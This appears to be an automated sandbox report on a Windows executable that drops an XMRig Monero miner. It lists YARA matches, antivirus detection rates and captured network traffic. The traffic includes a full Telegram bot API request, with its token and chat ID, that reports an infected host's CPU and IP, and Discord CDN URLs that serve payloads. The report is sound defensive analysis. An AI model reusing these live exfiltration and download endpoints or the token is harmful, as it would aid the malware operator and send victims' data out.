  • 0xf79a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x139ca:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x13afc:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x13b8e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x14d0a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x1585e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x162c6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x1633e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
00000022.00000000.474898368.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmpCoinMiner_StringsDetects mining pool protocol string in ExecutableFlorian Roth
  • 0x75a0:$sa1: stratum+tcp://
Click to see the 30 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
34.0.mvsc32.exe.7ff699710000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
  • 0x66b108:$x1: donate.ssl.xmrig.com
  • 0x66b5d9:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
  • 0x6fc723:$s2: \\?\pipe\uv\%p-%lu
34.0.mvsc32.exe.7ff699710000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    34.0.mvsc32.exe.7ff699710000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
    • 0x66c788:$s1: %s/%s (Windows NT %lu.%lu
    • 0x670e08:$s3: \\.\WinRing0_
    • 0x611b42:$s4: pool_wallet
    • 0x60c170:$s5: cryptonight
    • 0x60c17e:$s5: cryptonight
    • 0x60c18d:$s5: cryptonight
    • 0x60c19b:$s5: cryptonight
    • 0x60c1b0:$s5: cryptonight
    • 0x60c1bf:$s5: cryptonight
    • 0x60c1cd:$s5: cryptonight
    • 0x60c1e2:$s5: cryptonight
    • 0x60c1f1:$s5: cryptonight
    • 0x60c202:$s5: cryptonight
    • 0x60c219:$s5: cryptonight
    • 0x60c227:$s5: cryptonight
    • 0x60c235:$s5: cryptonight
    • 0x60c245:$s5: cryptonight
    • 0x60c257:$s5: cryptonight
    • 0x60c268:$s5: cryptonight
    • 0x60c278:$s5: cryptonight
    • 0x60c288:$s5: cryptonight
    34.2.mvsc32.exe.7ff699710000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
    • 0x66b108:$x1: donate.ssl.xmrig.com
    • 0x66b5d9:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
    • 0x6fc723:$s2: \\?\pipe\uv\%p-%lu
    34.2.mvsc32.exe.7ff699710000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      Click to see the 13 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: bQQHP9ciRL.exeVirustotal: Detection: 20%Perma Link
      Source: bQQHP9ciRL.exeMetadefender: Detection: 25%Perma Link
      Source: bQQHP9ciRL.exeReversingLabs: Detection: 57%
      Antivirus detection for dropped file
      Source: C:\ProgramData\Systemd\mvsc32.exeAvira: detection malicious, Label: HEUR/AGEN.1203240
      Multi AV Scanner detection for dropped file
      Source: C:\ProgramData\MicrosoftNetwork\System.exeVirustotal: Detection: 20%Perma Link
      Source: C:\ProgramData\MicrosoftNetwork\System.exeMetadefender: Detection: 25%Perma Link
      Source: C:\ProgramData\MicrosoftNetwork\System.exeReversingLabs: Detection: 57%
      Source: C:\ProgramData\Systemd\mvsc32.exeVirustotal: Detection: 71%Perma Link
      Source: C:\ProgramData\Systemd\mvsc32.exeMetadefender: Detection: 31%Perma Link
      Source: C:\ProgramData\Systemd\mvsc32.exeReversingLabs: Detection: 69%
      Source: C:\ProgramData\Systemd\old.exe (copy)Virustotal: Detection: 71%Perma Link
      Source: C:\ProgramData\Systemd\old.exe (copy)Metadefender: Detection: 31%Perma Link
      Source: C:\ProgramData\Systemd\old.exe (copy)ReversingLabs: Detection: 69%
      Machine Learning detection for sample
      Source: bQQHP9ciRL.exeJoe Sandbox ML: detected
      Machine Learning detection for dropped file
      Source: C:\ProgramData\MicrosoftNetwork\System.exeJoe Sandbox ML: detected
      Source: C:\ProgramData\Systemd\mvsc32.exeJoe Sandbox ML: detected

      Bitcoin Miner

      barindex
      Yara detected Xmrig cryptocurrency miner
      Source: Yara matchFile source: 34.0.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 34.2.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 32.2.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.mvsc32.exe.7ff759560000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.mvsc32.exe.7ff759560000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 32.0.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000022.00000000.474898368.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000000.476066900.00007FF69A215000.00000008.00000001.01000000.0000000A.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000002.488689886.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000022.00000000.478030671.00007FF69A215000.00000008.00000001.01000000.0000000A.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000022.00000002.498632171.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.457813764.00007FF75A065000.00000008.00000001.01000000.0000000C.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000002.499743340.00007FF69A215000.00000008.00000001.01000000.0000000A.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.440562976.00007FF75A065000.00000008.00000001.01000000.0000000C.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000000.473740757.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000022.00000002.502330836.00007FF69A215000.00000008.00000001.01000000.0000000A.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.438260120.00007FF759B6C000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.445162667.00007FF759B6C000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
      Source: Yara matchFile source: C:\ProgramData\Systemd\mvsc32.exe, type: DROPPED
      Source: unknownHTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.6:49752 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49754 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49755 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.6:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49771 version: TLS 1.2
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\

      Networking

      barindex
      Uses the Telegram API (likely for C&C communication)
      Source: unknownDNS query: name: api.telegram.org
      Source: unknownDNS query: name: api.telegram.org
      May check the online IP address of the machine
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeDNS query: name: api.ipify.org
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeDNS query: name: api.ipify.org
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeDNS query: name: api.ipify.org
      Source: C:\ProgramData\MicrosoftNetwork\System.exeDNS query: name: api.ipify.org
      Source: C:\ProgramData\MicrosoftNetwork\System.exeDNS query: name: api.ipify.org
      Source: C:\ProgramData\MicrosoftNetwork\System.exeDNS query: name: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=486764648&text=New%20User:%20287400%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0AIP:%2084.17.52.14 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.telegram.org
      Source: global trafficHTTP traffic detected: GET /attachments/871345933034606592/995414388804685824/UpSys.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /attachments/871345933034606592/995412381125574716/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=486764648&text=New%20User:%20287400%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0AIP:%2084.17.52.14 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.telegram.org
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: bQQHP9ciRL.exe, 00000000.00000003.390253916.0000000000729000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.390148297.0000000003552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: bQQHP9ciRL.exe, 00000000.00000003.390253916.0000000000729000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.390148297.0000000003552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: bQQHP9ciRL.exe, 00000000.00000003.390253916.0000000000729000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.390148297.0000000003552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: bQQHP9ciRL.exe, 00000000.00000002.583126829.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.384351602.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.385519392.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.669577129.0000021630783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: bQQHP9ciRL.exe, 00000000.00000003.384461365.0000000000708000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.384526757.0000000000722000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.384221745.0000000000708000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.385654985.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
      Source: powershell.exe, 00000002.00000003.476790520.0000021630CBD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.512312940.0000021630CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
      Source: powershell.exe, 00000002.00000003.512686825.0000021630D16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.508921208.0000021630D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.osofts/Microt0
      Source: bQQHP9ciRL.exe, 00000000.00000002.583126829.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.384351602.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.385519392.00000000006D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
      Source: bQQHP9ciRL.exe, 00000000.00000003.384461365.0000000000708000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.384526757.0000000000722000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000000.501209281.0000000000708000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.384221745.0000000000708000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.385654985.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
      Source: powershell.exe, 00000002.00000002.649626283.0000021628393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: bQQHP9ciRL.exe, 00000000.00000003.390253916.0000000000729000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.390148297.0000000003552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: bQQHP9ciRL.exe, 00000000.00000003.390253916.0000000000729000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.390148297.0000000003552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: bQQHP9ciRL.exe, 00000000.00000003.390253916.0000000000729000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.390148297.0000000003552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: powershell.exe, 00000002.00000002.532099856.0000021618538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.672571801.0000021630BF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
      Source: powershell.exe, 00000002.00000002.523355586.0000021618331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: bQQHP9ciRL.exe, 00000000.00000003.390253916.0000000000729000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.390148297.0000000003552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: powershell.exe, 00000002.00000002.532099856.0000021618538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: bQQHP9ciRL.exe, 00000000.00000000.505690459.0000000140049000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
      Source: bQQHP9ciRL.exe, 00000000.00000000.505690459.0000000140049000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.11.z%02dH
      Source: bQQHP9ciRL.exe, 00000000.00000003.384461365.0000000000708000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000000.505690459.0000000140049000.00000002.00000001.01000000.00000003.sdmp, bQQHP9ciRL.exe, 00000000.00000003.384221745.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
      Source: bQQHP9ciRL.exe, 00000000.00000000.498170139.000000000063B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/-
      Source: bQQHP9ciRL.exe, 00000000.00000000.498170139.000000000063B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/5
      Source: bQQHP9ciRL.exe, 00000000.00000000.505690459.0000000140049000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.org/root
      Source: bQQHP9ciRL.exe, 00000000.00000000.501209281.0000000000708000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.385654985.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
      Source: bQQHP9ciRL.exe, 00000000.00000000.505690459.0000000140049000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/bot
      Source: bQQHP9ciRL.exe, 00000000.00000000.505690459.0000000140049000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.telegram.org/bot%0A
      Source: bQQHP9ciRL.exe, 00000000.00000003.385519392.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.385654985.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=48676
      Source: bQQHP9ciRL.exe, 00000000.00000002.585020543.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
      Source: bQQHP9ciRL.exe, 00000000.00000000.505690459.0000000140049000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/871345933034606592/995412380618067998/GPU6.ziphttps://cdn.dis
      Source: bQQHP9ciRL.exe, 00000000.00000002.585020543.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.462604278.0000000003507000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.458470943.000000000351B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/871345933034606592/995412381125574716/CPU.zip
      Source: bQQHP9ciRL.exe, 00000000.00000000.519257216.00000000034BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/871345933034606592/995412381125574716/CPU.zip$
      Source: bQQHP9ciRL.exe, 00000000.00000000.501652483.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/871345933034606592/995412381125574716/CPU.zip-C:
      Source: bQQHP9ciRL.exe, 00000000.00000003.458449947.0000000003516000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.464143211.0000000003516000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.462604278.0000000003507000.00000004.00000020.00020000.00000000.sdmp, bQQHP9ciRL.exe, 00000000.00000003.458470943.000000000351B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/871345933034606592/995412381125574716/CPU.zipC:
      Source: bQQHP9ciRL.exe, 00000000.00000000.519257216.00000000034BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/871345933034606592/995412381125574716/CPU.zipL
      Source: bQQHP9ciRL.exe, 00000000.00000000.498170139.000000000063B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/871345933034606592/995412381125574716/CPU.zipSSC:
      Source: bQQHP9ciRL.exe, 00000000.00000000.519257216.00000000034BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/871345933034606592/995412381125574716/CPU.zipe
      Source: bQQHP9ciRL.exe, 00000000.00000000.516891983.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/871345933034606592/995414388804685824/UpSys.exe
      Source: powershell.exe, 00000002.00000002.649626283.0000021628393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.649626283.0000021628393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.649626283.0000021628393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000002.00000002.532099856.0000021618538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: bQQHP9ciRL.exe, 00000000.00000000.517136127.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
      Source: powershell.exe, 00000002.00000002.649626283.0000021628393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: bQQHP9ciRL.exe, 00000000.00000003.390148297.0000000003552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownDNS traffic detected: queries for: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=486764648&text=New%20User:%20287400%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0AIP:%2084.17.52.14 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.telegram.org
      Source: global trafficHTTP traffic detected: GET /attachments/871345933034606592/995414388804685824/UpSys.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /attachments/871345933034606592/995412381125574716/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=486764648&text=New%20User:%20287400%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0AIP:%2084.17.52.14 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36Host: api.telegram.org
      Source: unknownHTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.6:49752 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49754 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.6:49755 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.6:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49771 version: TLS 1.2

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 34.0.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 34.0.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 34.2.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 34.2.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 32.2.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 32.2.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 7.0.mvsc32.exe.7ff759560000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 7.0.mvsc32.exe.7ff759560000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 7.2.mvsc32.exe.7ff759560000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 7.2.mvsc32.exe.7ff759560000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 32.0.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 32.0.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: C:\ProgramData\Systemd\mvsc32.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: C:\ProgramData\Systemd\mvsc32.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
      PE file contains section with special chars
      Source: bQQHP9ciRL.exeStatic PE information: section name: .[UG9j
      Source: bQQHP9ciRL.exeStatic PE information: section name: .:&C@J
      Source: bQQHP9ciRL.exeStatic PE information: section name: .gPNi
      Source: System.exe.0.drStatic PE information: section name: .[UG9j
      Source: System.exe.0.drStatic PE information: section name: .:&C@J
      Source: System.exe.0.drStatic PE information: section name: .gPNi
      Source: 34.0.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
      Source: 34.0.mvsc32.exe.7ff699710000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
